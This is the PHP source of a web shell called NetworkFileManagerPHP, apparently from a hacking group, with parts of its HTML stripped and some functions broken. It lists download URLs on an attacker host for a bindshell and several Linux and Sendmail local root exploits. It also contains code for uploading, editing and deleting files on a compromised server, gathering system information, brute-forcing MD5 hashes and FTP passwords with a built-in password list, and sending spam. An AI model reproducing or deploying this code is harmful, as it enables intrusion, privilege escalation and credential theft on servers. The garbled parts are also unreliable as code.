html;
$key="goatse";
$string="";
/* randomizing letters array for random filenames of compression folders */
$CHARS = "abcdefghijklmnopqrstuvwxyz";
for ($i=0; $i<6; $i++) $pass .= $CHARS[rand(0,strlen($CHARS)-1)];
/* set full path to host and dir where public exploits and soft are situated */
$public_site = "http://hackru.info/adm/exploits/public_exploits/";
/* $public_site = "http://localhost/adm/public_exploits/"; */
/* Public exploits and soft */
$public[1] = "s"; // bindshell
$title_ex[1] = "
bindtty.c - remote shell on 4000 port, with rights of current user (id of apache)
Run: ./s
Connect tot host with your favorite telnet client. Best of them are putty and SecureCRT
";
$public[2] = "m"; // mremap
$title_ex[2] = "
MREMAP - allows to gain local root priveleges by exploiting the bug of memory .
Run: ./m
Note: Run only from telnet session, not from web!!!
";
$public[3] = "p"; // ptrace
$title_ex[3] = "
PTRACE - good one, works like mremap, but for another bug
Run: ./p
Note: Run only from telnet session, not from web!!!
";
$public[4] = "psyBNC2.3.2-4.tar.gz"; // psybnc
$title_ex[4] = "
psyBNC - Last release of favorite IRC bouncer
Decompression: tar -zxf psyBNC2.3.2-4.tar.gz // will be folder psybnc
Compilation, installing and running psybnc: make // making psybnc // ./psybnc // You may edit psybnc.conf with NFM, Default listening port is 31337 - connect to it with your favotite IRC client and set a password
Allowed to run with uid of apache, but check out the firewall!
";
/* Private exploits */
$private[1] = "brk"; // localroot root linux 2.4.*
$title_exp[1] = "
localroot root linux 2.4.* - Exploit do_brk (code added) - gains local root priveleges if exploited succes
Run: ./brk
Note: Run only from telnet session, not from web!!!
";
$private[2] = "dupescan"; // Glftpd DupeScan Local Exploit by RagnaroK
$title_exp[2] = "
lGlftpd DupeScan Local Exploit - private local root exploits for Glftpd daemon
There are 2 files: dupescan and glftpd To gain root uid, you need to write dupescan to
glftpd/bin/ with command cp dupescan glftpd/bin/, and after run ./glftpd. Get the root!!!
Note: Run only from telnet session, not from web!!!
";
$private[3] = "glftpd";
$title_exp[3] = "
lGlftpd DupeScan Local Exploit - private local root exploits for Glftpd daemon
part 2
Note: Run only from telnet session, not from web!!!
";
$private[4] = "sortrace";
$title_exp[4] = "
Traceroute v1.4a5 exploit by sorbo - private local root exploit for traceroute up to 1.4.a5
Run: ./sortrace
Note: Run only from telnet session, not from web!!!
";
$private[5] = "root";
$title_exp[5] = "
localroot root linux 2.4.* - ptrace private_mod exploits, may gain local root privaleges
Run: ./root
Note: Run only from telnet session, not from web!!!
";
$private[6] = "sxp";
$title_exp[6] = "
Sendmail 8.11.x exploit localroot - private local root exploit for Sendmail 8.11.x
Run: ./sxp
Note: Run only from telnet session, not from web!!!
";
$private[7] = "ptrace_kmod";
$title_exp[7] = "
localroot root linux 2.4.* - private local root exploit, uses kmod bug + ptrace , gives local root
Run: ./ptrace_kmod
Note: Run only from telnet session, not from web!!!
";
$private[8] = "mr1_a";
$title_exp[8] = "
localroot root linux 2.4.* - mremap any memory size local root exploit for kernels 2.4.x
Run: ./mr1_a
Note: Run only from telnet session, not from web!!!
";
/* set full path to host and dir where private exploits and soft are situated */
$private_site = "http://hackru.info/adm/exploits/private_exploits/";
endif;
$createdir= "files";
/* spamer config */
$sendemail = "packetstorm@km.ru";
$confirmationemail = "packetstorm@km.ru";
$mailsubject = "Hello!This is a test message!";
/* !!!Warning: DO NOT CHANGE ANYTHING IF YOU DUNNO WHAT ARE YOU DOING */
global $action,$tm,$cm;
function getdir() {
global $gdir,$gsub,$i,$j,$REMOTE_ADDR,$PHP_SELF;
$st = getcwd();
$st = str_replace("\\","/",$st);
$j = 0;
$gdir = array();
$gsub = array();
print(" ");
for ($i=0;$i<=(strlen($st)-1);$i++) {
if ($st[$i] != "/") {
$gdir[$j] = $gdir[$j].$st[$i];
$gsub[$j] = $gsub[$j].$st[$i];
} else {
$gdir[$j] = $gdir[$j]."/";
$gsub[$j] = $gsub[$j]."/";
$gdir[$j+1] = $gdir[$j];
$j++;
}
}
print("
Current directory: ");
for ($i = 0;$i<=$j;$i++) print("$gsub[$i]");
$free = tinhbyte(diskfreespace("./"));
print("
Current disk free space : $free
");
print("
".exec("uname -a")."
");
print("
".exec("cat /proc/cpuinfo | grep GHz")." Real speed of ".exec("cat /proc/cpuinfo | grep MHz")."
");
print("
Perhaps release is : ".exec("cat /etc/redhat-release")."
";
getdir();
readdirdata($tm);
}
# directory delete
function deletef($dir)
{
global $action,$tm,$fi;
$tm = str_replace("\\\\","/",$tm);
$link = $tm."/".$fi;
unlink($link);
chdir($tm);
getdir();
readdirdata($tm);
}
# file upload
function uploadtem() {
global $file,$tm,$thum,$PHP_SELF,$dir,$style_button;
echo "
";
}
function upload() {
global $HTTP_POST_FILES,$tm;
echo $set;
copy($HTTP_POST_FILES["userfile"][tmp_name], $tm."/".$HTTP_POST_FILES["userfile"][name]) or die("Unable to upload file".$HTTP_POST_FILES["userfile"][name]);
echo "
File ".$HTTP_POST_FILES["userfile"][name]." was successfully uploaded.
";
@unlink($userfile);
chdir($tm);
getdir();
readdirdata($tm);
}
# get exploits
function upload_exploits() {
global $PHP_SELF,$style_button, $public_site, $private_site, $public, $title_ex, $style_open, $private, $title_exp;
echo "
";
echo "
";
echo "
";
echo "
";
echo "
";
echo "
";
echo "
";
echo "
";
echo "
";
echo "
";
echo "
";
echo "
";
}
# new directory creation
function newdir($dir) {
global $tm,$nd;
print("
");
}
function cdir($dir) {
global $newd,$tm;
$fullpath = $dir."/".$newd;
if (file_exists($fullpath)) @rmdir($fullpath);
if (@mkdir($fullpath,0777)) {
echo "
Directory was created.
";
} else {
echo "
Error during directory creation.
";
}
chdir($tm);
getdir();
readdirdata($tm);
}
// creation of directory where exploits will be situated
function downfiles() {
global $action,$status, $tm,$PHP_SELF,$HTTP_HOST, $file3, $file2, $gdir,$gsub,$i,$j,$REMOTE_ADDR;
$st = getcwd();
$st = str_replace("\\","/",$st);
$j = 0;
$gdir = array();
$gsub = array();
print(" ");
for ($i=0;$i<=(strlen($st)-1);$i++) {
if ($st[$i] != "/") {
$gdir[$j] = $gdir[$j].$st[$i];
$gsub[$j] = $gsub[$j].$st[$i];
} else {
$gdir[$j] = $gdir[$j]."/";
$gsub[$j] = $gsub[$j]."/";
$gdir[$j+1] = $gdir[$j];
$j++;
}
}
print("
Path: ");
for ($i = 0;$i<=$j;$i++) print("$gsub[$i]");
print("
");
echo "
";
}
# directory delete
function deldir() {
global $dd,$tm;
$fullpath = $tm."/".$dd;
echo "
Directory was deleted successfully.
";
rmdir($fullpath);
chdir($tm);
getdir();
readdirdata($tm);
}
# directory compression
function arhiv() {
global $tar,$tm,$pass;
$fullpath = $tm."/".$tar;
echo "
";
}
function down($dir) {
global $action,$status, $tm,$PHP_SELF,$HTTP_HOST, $file3, $file2;
ignore_user_abort(1);
set_time_limit(0);
echo "
File upload
There are many cases, when host, where NFM is situated WGET is blocked. And you may need to upload files anyway. So here you can do it without wget, upload file to path where the NFM is, or to any path you enter (seePath).(this works not everywhere)
During your work with script NetworkFileManagerPHP you may want to ask some quetions, or advice author to add some functions, which are not supported yet. Write them here, and your request will be sattisfied.
";
}
}
# help
function help() {
global $action,$REMOTE_ADDR,$HTTP_REFERER;
echo "
help for scriptNetworkFileManagerPHP
NetworkFileManagerPHP - script to access your host in a best way
There were added some commands to NFM, from scripts kind of itself. They are:
- Using aliases (Rush)
- FTP bruteforce (TerraByte)
- Translated to english by (revers)
- Added some sysinfo commands by (revers)
- All the rest code belongs to me (xoce)
- Thanks for testing goes to all #hack.ru channel
Warning, we wanted to show by this script, that admins have to protect their system better, then they do now. Jokes with apache config are not good... Pay more attention to configuration of your system.
How can you find us:
Irc server: irc.megik.net:6667 /join #hack.ru
See you round at network!!!
";
}
}
}
}
function tar() {
global $action, $filename;
set_time_limit(0);
echo "
Data compression
According to the different settings of servers, I didn't make default config of NFM. You're to write full path to the domain's folder and then press enter, so all data, containing in this folder will be compressed to tar.gz.
Warning! File passwd can have big size, so opening all users of this host can waste much time.
It's highly recommended! Open current function in another window of browser, to compress information, which you're interested in, during your host exploring.
";
}
function crypte() {
global $action,$md5a,$sha1a,$crc32, $key,$string;
echo "
Data crypter
Now there are many different programs and scripts, which uses a lot of passwords crypt methods (Do you remember what a phpBB is?=)), so with NFM you can crypt some strings to hashes, because sometimes you may need to change somebodyes data with your one =). Also you may change your pass to NFM here.
";
echo "
";
echo "
";
echo "
";
}
function decrypte() {
global $action,$pass_de,$chars_de,$dat,$date;
set_time_limit(0);
ignore_user_abort(1);
echo "
Data decrypter
It's known all over the world, that MD5 crypt algorithm has no way to decrypt it, because it uses hashes. The one and only one way to try read what the hash is - to generate some hashes and then to compare them with source hash needed to be decrypted ... So this is bruteforce.
";
if($chars_de==""){$chars_de="";}
echo "
";
if($_POST[pass_de]){
$pass_de=htmlspecialchars($pass_de);
$pass_de=stripslashes($pass_de);
$dat=date("H:i:s");
$date=date("d:m:Y");
crack_md5();
}
}
function crack_md5() {
global $chars_de;
$chars=$_POST[chars];
set_time_limit(0);
ignore_user_abort(1);
$chars_de=str_replace("<",chr(60),$chars_de);
$chars_de=str_replace(">",chr(62),$chars_de);
$c=strlen($chars_de);
for ($next = 0; $next <= 31; $next++) {
for ($i1 = 0; $i1 <= $c; $i1++) {
$word[1] = $chars_de{$i1};
for ($i2 = 0; $i2 <= $c; $i2++) {
$word[2] = $chars_de{$i2};
if ($next <= 2) {
result(implode($word));
}else {
for ($i3 = 0; $i3 <= $c; $i3++) {
$word[3] = $chars_de{$i3};
if ($next <= 3) {
result(implode($word));
}else {
for ($i4 = 0; $i4 <= $c; $i4++) {
$word[4] = $chars_de{$i4};
if ($next <= 4) {
result(implode($word));
}else {
for ($i5 = 0; $i5 <= $c; $i5++) {
$word[5] = $chars_de{$i5};
if ($next <= 5) {
result(implode($word));
}else {
for ($i6 = 0; $i6 <= $c; $i6++) {
$word[6] = $chars_de{$i6};
if ($next <= 6) {
result(implode($word));
}else {
for ($i7 = 0; $i7 <= $c; $i7++) {
$word[7] = $chars_de{$i7};
if ($next <= 7) {
result(implode($word));
}else {
for ($i8 = 0; $i8 <= $c; $i8++) {
$word[8] = $chars_de{$i8};
if ($next <= 8) {
result(implode($word));
}else {
for ($i9 = 0; $i9 <= $c; $i9++) {
$word[9] = $chars_de{$i9};
if ($next <= 9) {
result(implode($word));
}else {
for ($i10 = 0; $i10 <= $c; $i10++) {
$word[10] = $chars_de{$i10};
if ($next <= 10) {
result(implode($word));
}else {
for ($i11 = 0; $i11 <= $c; $i11++) {
$word[11] = $chars_de{$i11};
if ($next <= 11) {
result(implode($word));
}else {
for ($i12 = 0; $i12 <= $c; $i12++) {
$word[12] = $chars_de{$i12};
if ($next <= 12) {
result(implode($word));
}else {
for ($i13 = 0; $i13 <= $c; $i13++) {
$word[13] = $chars_de{$i13};
if ($next <= 13) {
result(implode($word));
}else {
for ($i14 = 0; $i14 <= $c; $i14++) {
$word[14] = $chars_de{$i14};
if ($next <= 14) {
result(implode($word));
}else {
for ($i15 = 0; $i15 <= $c; $i15++) {
$word[15] = $chars_de{$i15};
if ($next <= 15) {
result(implode($word));
}else {
for ($i16 = 0; $i16 <= $c; $i16++) {
$word[16] = $chars_de{$i16};
if ($next <= 16) {
result(implode($word));
}else {
for ($i17 = 0; $i17 <= $c; $i17++) {
$word[17] = $chars_de{$i17};
if ($next <= 17) {
result(implode($word));
}else {
for ($i18 = 0; $i18 <= $c; $i18++) {
$word[18] = $chars_de{$i18};
if ($next <= 18) {
result(implode($word));
}else {
for ($i19 = 0; $i19 <= $c; $i19++) {
$word[19] = $chars_de{$i19};
if ($next <= 19) {
result(implode($word));
}else {
for ($i20 = 0; $i20 <= $c; $i20++) {
$word[20] = $chars_de{$i20};
if ($next <= 20) {
result(implode($word));
}else {
for ($i21 = 0; $i21 <= $c; $i21++) {
$word[21] = $chars_de{$i21};
if ($next <= 21) {
result(implode($word));
}else {
for ($i22 = 0; $i22 <= $c; $i22++) {
$word[22] = $chars_de{$i22};
if ($next <= 22) {
result(implode($word));
}else {
for ($i23 = 0; $i23 <= $c; $i23++) {
$word[23] = $chars_de{$i23};
if ($next <= 23) {
result(implode($word));
}else {
for ($i24 = 0; $i24 <= $c; $i24++) {
$word[24] = $chars_de{$i24};
if ($next <= 24) {
result(implode($word));
}else {
for ($i25 = 0; $i25 <= $c; $i25++) {
$word[25] = $chars_de{$i25};
if ($next <= 25) {
result(implode($word));
}else {
for ($i26 = 0; $i26 <= $c; $i26++) {
$word[26] = $chars_de{$i26};
if ($next <= 26) {
result(implode($word));
}else {
for ($i27 = 0; $i27 <= $c; $i27++) {
$word[27] = $chars_de{$i27};
if ($next <= 27) {
result(implode($word));
}else {
for ($i28 = 0; $i28 <= $c; $i28++) {
$word[28] = $chars_de{$i28};
if ($next <= 28) {
result(implode($word));
}else {
for ($i29 = 0; $i29 <= $c; $i29++) {
$word[29] = $chars_de{$i29};
if ($next <= 29) {
result(implode($word));
}else {
for ($i30 = 0; $i30 <= $c; $i30++) {
$word[30] = $chars_de{$i30};
if ($next <= 30) {
result(implode($word));
}else {
for ($i31 = 0; $i31 <= $c; $i31++) {
$word[31] = $chars_de{$i31};
if ($next <= 31) {
result(implode($word));
}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}
function result($word) {
global $dat,$date;
$pass_de=$_POST[pass_de];
$dat2=date("H:i:s");
$date2=date("d:m:Y");
if(md5($word)==$pass_de){
print "
This is new ftp-bruteforcer it can make his own brute passwords list on the fly he needs nothing to do it, so It's not a problem for you to bryte any ftp account now. But do not write very big value of passwords (10000 will be quite enough) because it mat couse a very heavy server overload .
";
echo "
";
function s() {
$word="qwrtypsdfghjklzxcvbnm";
return $word[mt_rand(0,strlen($word)-1)];
}
function g() {
$word="euioam";
return $word[mt_rand(0,strlen($word)-2)];
}
function name0() { return s().g().s(); }
function name1() { return s().g().s().g(); }
function name2() { return s().g().g().s(); }
function name3() { return s().s().g().s().g(); }
function name4() { return g().s().g().s().g(); }
function name5() { return g().g().s().g().s(); }
function name6() { return g().s().s().g().s(); }
function name7() { return s().g().g().s().g(); }
function name8() { return s().g().s().g().g(); }
function name9() { return s().g().s().g().s().g(); }
function name10() { return s().g().s().s().g().s().s(); }
function name11() { return s().g().s().s().g().s().s().g(); }
$cool=array(1,2,3,4,5,6,7,8,9,10,99,100,111,111111,666,1978,1979,1980,1981,1982,1983,1984,1985,1986,1987,1988,1989,1990,1991,1992,1993,1994,1995,1996,1997,1998,1999,2000,2001,2002,2003,2004,2005);
$cool2=array('q1w2e3','qwerty','qwerty111111','123456','1234567890','0987654321','asdfg','zxcvbnm','qazwsx','q1e3r4w2','q1r4e3w2','1q2w3e','1q3e2w','poiuytrewq','lkjhgfdsa','mnbvcxz','asdf','root','admin','admin123','lamer123','admin123456','administrator','administrator123','q1w2e3r4t5','root123','microsoft','muther','hacker','hackers','cracker');
function randword() {
global $cool;
$func="name".mt_rand(0,11);
$func2="name".mt_rand(0,11);
switch (mt_rand(0,11)) {
case 0: return $func().mt_rand(5,99);
case 1: return $func()."-".$func2();
case 2: return $func().$cool[mt_rand(0,count($cool)-1)];
case 3: return $func()."!".$func();
case 4: return randpass(mt_rand(5,12));
default: return $func();
}
}
function randpass($len) {
$word="qwertyuiopasdfghjklzxcvbnm1234567890";
$s="";
for ($i=0; $i<$len; $i++) {
$s.=$word[mt_rand(0,strlen($word)-1)];
}
return $s;
}
if (@unlink("pass.txt") < 0){
echo "nothing";
exit;
}
$file="pass.txt";
if($file && $host && $login){
$cn=mt_rand(30,30);
for ($i=0; $i<$cn; $i++) {
$s=$cool2[$i];
$f=@fopen(pass.".txt","a+");
fputs($f,"$s\n");
}
$cnt2=mt_rand(43,43);
for ($i=0; $i<$cnt2; $i++) {
$r=$cool[$i];
$f=@fopen(pass.".txt","a+");
fputs($f,"$login$r\n");
}
$p="$proverka";
$f=@fopen(pass.".txt","a+");
fputs($f,"$p\n");
$cnt3=mt_rand($chislo,$chislo);
for ($i=0; $i<$cnt3; $i++) {
$u=randword();
$f=@fopen(pass.".txt","a+");
fputs($f,"$u\n");
}
if(is_file($file)){
$passwd=file($file,1000);
for($i=0; $i
Congratulations! Password is known now.
Connected to: $host with login: $login with password: $password
";
}
// SQL END
/* main() */
set_time_limit(0);
if ( $action !="download") print("$HTML");
if (!isset($cm)) {
if (!isset($action)) {
if (!isset($tm)) { $tm = getcwd(); }
$curdir = getcwd();
if (!@chdir($tm)) exit("
Access to directory is denied, see CHMOD.
");
getdir();
chdir($curdir);
$supsub = $gdir[$j-1];
if (!isset($tm) ) { $tm=getcwd();}
readdirdata($tm);
} else {
switch ($action) {
case "view":
viewfile($tm,$fi);
break;
case "delete":
echo "
File $fi was deleted successfully.
";
deletef($tm);
break;
case "download":
if (isset($fatt) && strlen($fatt)>0) {
$attach=$fatt;
header("Content-type: text/plain");
}
else {
$attach=$fi;
header("Content-type: hackru");
}
header("Content-disposition: attachment; filename=\"$attach\";");
readfile($tm."/".$fi);
break;
case "download_mail":
download_mail($tm,$fi);
break;
case "edit":
editfile($tm,$fi);
break;
case "save":
savefile($tm,$fi);
break;
case "uploadd":
uploadtem();
break;
case "up":
up($tm);
break;
case "newdir":
newdir($tm);
break;
case "createdir":
cdir($tm);
break;
case "deldir":
deldir();
break;
case "feedback":
mailsystem();
break;
case "upload":
upload();
break;
case "help":
help();
break;
case "ftp":
ftp();
break;
case "portscan":
portscan();
break;
case "sql":
sql();
break;
case "tar":
tar();
break;
case "bash":
bash();
break;
case "passwd":
passwd();
break;
case "exploits":
exploits($dir);
break;
case "upload_exploits":
upload_exploits($dir);
break;
case "upload_exploitsp":
upload_exploitsp($dir);
break;
case "arhiv":
arhiv($tm,$pass);
break;
case "crypte":
crypte();
break;
case "decrypte":
decrypte();
break;
case "brut_ftp":
brut_ftp();
break;
case "copyfile":
copyfile($tm,$fi);
break;
case "down":
down($dir);
break;
case "downfiles":
downfiles($dir);
break;
case "spam":
spam();
break;
}
}
} else {
echo "